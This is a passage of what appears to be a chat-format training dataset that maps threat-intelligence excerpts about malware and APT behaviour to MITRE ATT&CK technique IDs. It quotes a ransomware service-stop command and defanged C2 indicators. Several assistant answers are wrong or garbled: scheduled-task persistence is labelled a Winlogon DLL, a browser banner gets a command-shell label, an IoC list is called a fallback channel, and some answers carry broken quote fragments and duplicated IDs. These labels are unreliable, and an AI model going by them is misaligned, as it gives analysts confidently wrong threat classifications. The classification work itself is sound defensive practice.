\"ID# - Technique\". " }, { "role": "user", "content": "The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication" }, { "role": "assistant", "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques:   SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 443 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers then attempt to gain root access to the server by setting up a local privileged user named ‘hilde’ on the host server and use it in order to connect back via SSH" }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use advanced web injects to steal web banking credentials." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the end of the encryption process, Pay2Key will also terminate the MS SQL service using the following command net stop mssqlserver > nul in order to release the files locked by the service" }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET’s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks’ 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilGrab has the capability to capture video from a victim machine." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack can enumerate services on the victim machine." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet has a keylogging capability." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has used a custom routine to decrypt strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data." }, { "role": "assistant", "content": "T1561.001 - Disk Content Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "saves itself with a leading \".\" so that it's hidden from users by default." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To establish persistence, adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron collects Exchange emails matching rules specified in its configuration." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has used various methods of process injection including hot patching." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement." }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the period between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial institutions" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can identify the processes for Bkav antivirus." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Through manual reverse engineering, we were able to extract the main malicious Python modules from the Xbash executables and decompile them successfully. Therefore, in the later sections of this analysis, we show the Python source code." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS has created a scheduled task named \"MicrosoftEdge\" to establish persistence." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail." }, { "role": "assistant", "content": "T1550.001 - Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "4 Upload edg499.dat, which includes the list of interesting files" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After collecting files and logs from the victim, encrypts some collected data with Blowfish." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Process Explorer, Process Monitor and PCHunter have been utilized to discover any anti-malware or monitoring software and terminate it." }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An older variant of PLAINTEE performs UAC bypass." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe - For each CLR, enumerate all running application domains and perform the following actions for each domain: Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys: - Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri - Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions" }, { "role": "assistant", "content": "T1106 - Native API', 'T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP for communication to the control servers." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme has the ability to capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox has the ability to download next stage malware components to a compromised system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HARDRAIN opens the Windows Firewall to modify incoming connections." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer compares file names and paths to a list of excluded names and directory names during encryption." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files." }, { "role": "assistant", "content": "T1036.002 - Right-to-Left Override" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "includes garbage code to mislead anti-malware software and researchers." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has a command to start an interactive shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred can search through folders and files on the system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Intelligence gathering and stealing information has generally been the motivation behind Cicada’s attacks in the past, and that would appear to be the case in this attack campaign too. We observed the attackers archiving some folders of interest in these attacks, including in one organization folders relating to human resources (HR), audit and expense data, and meeting memos" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens." }, { "role": "assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seth-Locker has the ability to download and execute files on a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the “open” function using the ShellExecuteW API function" }, { "role": "assistant", "content": "T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has collected data of interest from network shares." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Expand can be used to download or upload a file over a network share." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to capture keystrokes." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used DNS tunneling for C2." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChromeUpdate.exe starts the file with “rundll32 cache.dll,ADB_Setup” Cache.dll analysis Cache.dll was written in C/C++ and built with a Microsoft compiler" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds a Registry Run key for ctfmon.exe to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of listing contents of folders on the victim. also searches for custom network encryption software on victims." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEARDROP ran as a Windows service from the \"c:\\windows\\syswow64\" folder." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the old campaign the actor 